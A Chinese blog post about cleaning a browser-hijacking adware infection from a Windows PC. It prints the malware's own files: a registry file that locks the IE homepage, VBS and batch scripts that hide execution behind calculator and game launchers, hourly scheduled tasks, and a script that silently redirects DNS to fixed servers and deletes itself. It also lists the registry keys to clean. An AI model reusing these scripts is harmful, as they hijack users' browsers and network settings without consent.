篡改主页的一种解决方法

最新推荐文章于 2022-02-23 15:02:25 发布
最新推荐文章于 2022-02-23 15:02:25 发布
阅读量1.3k 收藏
点赞数
分类专栏: windows 文章标签: cmd interface c search 金山 url
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jierui001/article/details/5872940
版权

   这一切问题都是因为下载了叫setup_softii.exe的文件,此可执行文件看上去就和winrar压缩的压缩包一样,习惯性的点了一下,杯具就开始了!本来要从华军软件站上下载FLASHFXP,被下载页面上的无数个“下载”按钮迷惑后,点错了一个,下载了setup_softii.exe,下载完成后,双击,就被迫安装了流氓软件,金山网盾,有道词典,开屏桌面画报!开始把这些软件都卸载了,但是篡改主页并且定时在桌面显示两个IE快捷方式的问题一直没有解决,实在忍受不了打开IE就是www.4555.net,下班之后,都在处理这个问题,分享出来,希望以后遇到此问题的朋友能少花点时间。
   刚开始用360安全卫士和360杀毒杀了一遍不起作用,难道要使用30元/次的帮帮堂?还是算了吧,这点问题都搞不定,以后咋混!从网上找了N多篡改主页的解决方法,都无效。最后从长计议,看一下9月7号到9月8号创建了哪些文件,把文件都找出来,这些流氓软件基本上无处可逃了!
   1、c:/windows/system32 下的dsu.reg
   Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/HideDesktopIcons/NewStartPanel]
"{450D8FBA-AD25-11D0-98A8-0800361B1103}"=dword:00000000
"{20D04FE0-3AEA-1069-A2D8-08002B30309D}"=dword:00000000
"{208D2C60-3AEA-1069-A2D7-08002B30309D}"=dword:00000000
"{871C5380-42A0-1069-A2EA-08002B30309D}"=dword:00000000

[HKEY_CLASSES_ROOT/CLSID/{871C5380-42A0-1069-A2EA-08002B30309D}/shell/OpenHomePage/Command]
@="iexplore.exe http://www.4555.net/?n1"

[HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main]
"Start Page"="http://www.4555.net/?ii"
"Search Page"="http://www.4555.net/?isi"
"Default_Page_URL"="http://www.4555.net/?ii"
  2、c:/windows/system32下的YoubakMSN.ini
 [setup]
path=C:/Program Files/CloudEx Onlinebackup/YoubakMSN
  3、c:/program files/Winsoftware. 
 一开始删不掉,从网上搜到一个处理办法,把他删除了。http://zhidao.baidu.com/question/182072489
  4、c:/program files/winzp文件夹下的
361.cmd
del   "%USERPROFILE%/Application Data/Microsoft/Intern~1/Quick Launch/*.lnk" /f
del   "%USERPROFILE%/Application Data/Microsoft/Intern~1/Quick Launch/*ore*.*" /f
del   "%USERPROFILE%/Application Data/Microsoft/Intern~1/Quick Launch/*淘*.*" /f
del   "%USERPROFILE%/「开始」菜单/程序/*ore*.*"  /f
del   "%USERPROFILE%/「开始」菜单/程序/*r.lnk"  /f

del   "%ALLUSERSPROFILE%/桌面/*览*.*" /f
del     "%ALLUSERSPROFILE%/桌面/*游*.*" /f
del   "%ALLUSERSPROFILE%/桌面/*电*.*" /f
del   "%ALLUSERSPROFILE%/桌面/*影*.*" /f
del   "%ALLUSERSPROFILE%/桌面/*淘*.*" /f

del   "%USERPROFILE%/桌面/*ore*.*"      /f
del   "%ALLUSERSPROFILE%/桌面/*ore*.*"  /f

del   "%USERPROFILE%/桌面/*览*.*"      /f
del   "%ALLUSERSPROFILE%/桌面/*览*.*"  /f

del   "%USERPROFILE%/桌面/*游*.*" /f
del     "%USERPROFILE%/桌面/*电*.*" /f
del   "%USERPROFILE%/桌面/*音*.*" /f
del   "%USERPROFILE%/桌面/*影*.*" /f
del   "%USERPROFILE%/桌面/*淘*.*" /f
del   "%USERPROFILE%/桌面/*3.lnk" /f
MyPc.vbs
DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
objShell.CurrentDirectory = "C:/Program Files/Winzp/"
iReturn=objShell.Run("cmd /C  ./tool.cmd", 0, TRUE)
iReturn=objShell.Run("cmd /C   ./361.cmd", 0, TRUE)
iReturn=objShell.Run("cmd /C    ./tb.cmd", 0, TRUE)
iReturn=objShell.Run("cmd /C     ./3.cmd", 0, TRUE)
system.cmd
echo %time%>>"%ALLUSERSPROFILE%/桌面/Internet Expleror.NomPc"
echo %time%>>"%ALLUSERSPROFILE%/桌面/淘宝-购物.NomTb"
echo %time%>>"%USERPROFILE%/Applic~1/Microsoft/Intern~1/Quick Launch/Internet Expleror.NomPc"
echo %time%>>"%userprofile%/Favorites/淘宝网 - 淘!我喜欢.NomTb"
echo %time%>>"D:/Backup/收藏夹/淘宝网 - 淘!我喜欢.NomTb"
echo %time%>>"%userprofile%/Favorites/网址导航站.NomPc"
echo %time%>>"D:/Backup/收藏夹/网址导航站.NomPc"
echo %time%>>"%USERPROFILE%/「开始」菜单/程序/Internet Expleror.NomPc"

md   "C:/Program Files/Winzp/"
copy    "C:/Program Files/Winsoftware../*.*"          "C:/Program Files/Winzp/"
copy   "C:/Program Files/Winzp/MyPc.nood"                 "%ALLUSERSPROFILE%/「开始」菜单/程序/启动/Pcc.lnk" /y

call   "C:/Program Files/Common Files/System/ado/dns2.cmd"
tb.cmd
copy   "./MyPc.nood"                 "%ALLUSERSPROFILE%/「开始」菜单/程序/启动/Pcc.lnk" /y
copy  "./tbgw.ico"  "C:/Program Files/Internet Explorer/tbgw.ico"
echo %time%>>"%ALLUSERSPROFILE%/桌面/Internet Expleror.NomPc"
echo %time%>>"%ALLUSERSPROFILE%/桌面/淘宝-购物.NomTb"
echo %time%>>"%USERPROFILE%/Applic~1/Microsoft/Intern~1/Quick Launch/Internet Expleror.NomPc"
echo %time%>>"%userprofile%/Favorites/淘宝网 - 淘!我喜欢.NomTb"
echo %time%>>"D:/Backup/收藏夹/淘宝网 - 淘!我喜欢.NomTb"
echo %time%>>"%userprofile%/Favorites/网址导航站.NomPc"
echo %time%>>"D:/Backup/收藏夹/网址导航站.NomPc"
echo %time%>>"%USERPROFILE%/「开始」菜单/程序/Internet Expleror.NomPc"

call "C:/Program Files/Common Files/System/ado/dns.cmd"
      call "./fav.cmd"
tbgw.ico
tool.cmd
regedit/s  "./dsu.reg"

md "C:/Program Files/Common Files/System/ado/"
copy "./system.cmd"      "C:/Program Files/Common Files/System/ado/system.cmd"

  5、还有C:/Program Files/Internet Explorer,也是9月8号新建的,
把里面的tbgw.ico删掉
  6、又找到
D:/Program Files/Common Files/Service目录下面有一些文件,把里面的不正常内容删掉!
msn.cmd全删,这个目录下的其他文件的只删iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.75", 0, TRUE)。

acls.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/WINDOWS/system32/calc.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.75", 0, TRUE)

jielong.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/WINDOWS/system32/freecell.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.76", 0, TRUE)

mpaint.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/WINDOWS/system32/mspaint.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.81", 0, TRUE)

msn.cmd

sc config Schedule start= auto
net start "Task Scheduler"
echo  0:06:30.03
at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 02:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 05:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 07:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 08:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 09:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
echo  0:06:30.14

msn.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/Progra~1/Messenger/msmsgs.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.73", 0, TRUE)

notepa.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/WINDOWS/system32/notepad.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.84", 0, TRUE)

out.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/Progra~1/Outloo~1/msimn.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.87", 0, TRUE)

saolei.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/WINDOWS/system32/winmine.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.89", 0, TRUE)

xiezhu.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/WINDOWS/system32/rcimlby.exe  -LaunchRA", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.93", 0, TRUE)

zhipai.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/WINDOWS/system32/sol.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.90", 0, TRUE)

zhizhuzhipai.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/WINDOWS/system32/spider.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.92", 0, TRUE)

   7、C:/Documents and Settings/All Users/Guest/Favorites目录下的
Favrites.vbs
  C:/Documents and Settings/All Users/Guest/FavoritesDIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c start http://www.baidu.com", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.70", 0, TRUE)
DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c start http://www.baidu.com", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd&22:57:45.32", 0, TRUE)

msn.cmd
sc config Schedule start= auto
net start "Task Scheduler"
echo  0:06:30.03
at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 02:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 05:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 07:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 08:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 09:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
echo  0:06:30.14
sc config Schedule start= auto
net start "Task Scheduler"
echo 22:57:45.79
at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 02:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 05:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 07:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 08:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 09:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
echo 22:57:45.87

8、C:/Documents and Settings/All Users/Application Data/Microsoft/softii/wd ,这下面是金山网盾,先用任务管理器关闭金山网盾的进程或用360找到服务进程关闭。

9、C:/Program Files/Common Files/System/ado文件夹下,
dns.cmd

netsh interface ip set dns "本地连接" static 58.83.139.241 primary
netsh interface ip add dns "本地连接" 61.158.167.219
netsh interface ip set dns "无线网络连接" static 58.83.139.241 primary
netsh interface ip add dns "无线网络连接" 61.158.167.219
del %0


10、等我把这些删了之后,重启计算机,打开ie,仍然是4555,明明都删了,还是啥原因呢,难道是上演最后的疯狂吗?打开regedit注册表编辑器,查找“www.4555”,查找到

/HKEY_LOCAL_MACHINE/SOFTWARE/Classes/.NomPc/shell/open/command 去掉4555,
HKEY_LOCAL_MACHINE/SOFTWARE/Classes/CLSID/{871C5380-42A0-1069-A2EA-08002B30309D}/shell/OpenHomePage/command 去掉4555,
HKEY_USERS/.DEFAULT/Software/Microsoft/Internet Explorer/Main 中修改Default_Page_URL,Search Page,Start Page
HKEY_USERS/S-1-5-21-1801674531-1972579041-725345543-500/Software/Microsoft/Internet Explorer/Main  修改Default_Page_URL,Search Page

11、执行完以上操作后,基本上就可以把这些流氓软件清理掉。正义战胜了邪恶!

 

 

捷睿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
IE首页被恶意篡改的12种解决方法
06-03
### IE首页被恶意篡改的12种解决方法详析 在互联网的使用过程中,许多用户都曾遭遇过IE浏览器首页被恶意篡改的问题。这种现象不仅令人恼火,还可能带来潜在的安全风险。本文将深入探讨IE首页被恶意篡改的12种常见...
使用“cmd /c start”时遇到路径中含有空格的解决方法
u011968063的博客
12-16 6685
使用“cmd /c start”时,当遇到路径中含有空格时,系统会报错。 这个问题很是让人苦恼,在网上摸索了很久,终于找到了好的解决方法。 当路径中有空格时,不使用 cmd /c start D:\Program Files (x86)\Java 命令,而是使用 cmd /c start "" "D:\Program Files (x86)\Java" 在start和路径之间加上一对双引号
Java执行cmd等命令、JavaFX原始窗口置底
haoranhaoshi的博客
04-02 1541
package BottomTest; /** * @Author: ZhangHao * @Description: 置底测试 * @Date: 2020/4/1 15:07 * @Version: 1.0 */ import javafx.application.Application; import javafx.scene.Scene; import javafx.scene...
浏览器主页篡改最终解决方案
热门推荐
Janbar
04-24 1万+
最近浏览器主页篡改了,网上到处找方法 什么改注册表啊、改快捷方式中多于的链接啊,等等都没用。 最终在几个知乎上的专业回答中看到了原因,https://www.zhihu.com/question/21883209 第一个回答就是了,说是explorer.exe被恶意dll修改了打开软件的过程,只要是通过explorer.exe打开浏览器都会中招。 因为双击可执行程序实质上是用explor...
一种简单的电子公用仪表解决方案
01-20
 电子公用仪表与目前使用的传统机械式和机电式仪表解决方案相比,具有很多优势。无论是气表、水表、热表,还是电表,都可以利用电子仪表的如下某些或全部特性:  精度更高  校准容易  防篡改保护  自动抄表...
行业文档-设计装置-一种纸质文档防篡改方法.zip
08-19
标题中的“行业文档-设计装置-一种纸质文档防篡改方法”揭示了这个压缩包文件包含的内容主要关于设计一种防止纸质文档被篡改的技术或方案。这种技术可能涉及到物理手段、数字签名、加密算法等多方面的知识。 描述中...
IE首页被恶意篡改的十二种解决方法
08-28
### IE首页被恶意篡改的十二种解决方法详解 #### 一、注册表被修改的原因及解决办法 在日常上网过程中,我们可能会遇到IE浏览器的首页、标题栏甚至是右键菜单被恶意篡改的情况,这通常是因为一些含有恶意代码的...
行业分类-设备装置-一种解决文件安全编辑需求的环境实现方法.zip
08-23
标题“行业分类-设备装置-一种解决文件安全编辑需求的环境实现方法”揭示了这是一个针对特定行业(可能是工业自动化、医疗设备、航空航天等)中设备装置的安全文件编辑解决方案。该解决方案旨在确保在编辑文件时,既...
2345 网址导航劫持 解决办法
CodingTheFuture
12-06 1万+
 打开 IE 或 Edge 浏览器,主页均被强行篡改为 https://www.2345.com/?11319 用过软媒魔方的人大概都有所体会,这两家公司就是乌合之众,迟早要死翘翘。 一、Edge 浏览器主页篡改,修改即可   二、IE 浏览器劫持 1.排查IE浏览器快捷方式是否被篡改 如果快捷方式后面没有 2345.com 的字样代表没有被篡改,如下是没有被篡改 2.排...
浏览器首页被雨林木风篡改( /hao.ylmf.com/u7654.html)
病毒才俊
04-21 6007
这个问题恶心了我好多天,今天终于忍不住上网搜了好半天,终于解决了,希望能帮到遇到同样问题的你。 解决方法:http://tieba.baidu.com/p/4254035418 在C:\ProgramData找到一个为无序字母数字的DLL,将他粉碎,重启ok.
流氓软件导致主页篡改成2345.com的分析,包括解决方法
qq_25870113的专栏
02-28 9325
如果您没有闲心看完整篇帖子而仅仅是为了寻求解决方法,请直接看最后     今天老妈用电脑升级个软件,结果带进来个不知什么东西,把我主页给改成了臭名昭著的2345.com,开始没在意:改了就改了吧,我再改回来吧。     当然,直接把主页改成about:blank肯定是没戏的,不过我也试了一下:万一好使呢?虽然结果不出所料的不好使。     再看一眼360安全卫士的锁定主页——居然还是空白
偷偷篡改IE首页的脚本源码及防御措施
弈风的专栏
08-20 858
在上网的时候,经常会遇到偷偷篡改IE标题栏的网页代码,当用户访问过它们的网页后,会更改IE的默认首页,或者每次开机后IE自动访问该网站等。下面看一看这个恶意代码是如何制作的,又该如何防范。下面通过剖析一段网页恶意代码给大家说明,通过对下面这段JavaScript程序的解剖,希望大家能够明白其究竟,并掌握修复的方法。网站应该用丰富精彩的内容来吸引访问者,如果寄希望于通过恶意篡改用户注册表来达到提高访问量的目的是很令人生厌的,更是一种不道德的行为。
2011年IE浏览器被恶意锁定的注册表解决办法
weixin_30633405的博客
12-13 88
原理就是在[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]这个注册表键值的IE路径后面加参数,然后设置“Everyone”对Command键值只有读取权限,无法修改。 #电脑相关 转载于:https://www.c...
{871C5380-42A0-1069-A2EA-08002B30309D}
weixin_34392843的博客
12-21 588
在Windows Vista中,不知道微软出于什么考虑,取消了长期以来一直存在于Windows桌面中的Internet Explorer图标,这让许多用户感觉很不习惯。虽然我们可以在桌面上创建IE的快捷方式,甚至可以通过移除IE快捷方式图标中的箭头来使之更像“传统”Windows桌面的中IE图标,但是,但功能上的不足如无法再像以前那样通过IE图标的右键属性来更改IE设置仍让人...
强制篡改主页的代码
fushengruoke的专栏
11-06 1635
以下例子是改为搜狐  测试脚本 wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","http://www.sohu.com"); wsh.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 8927
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值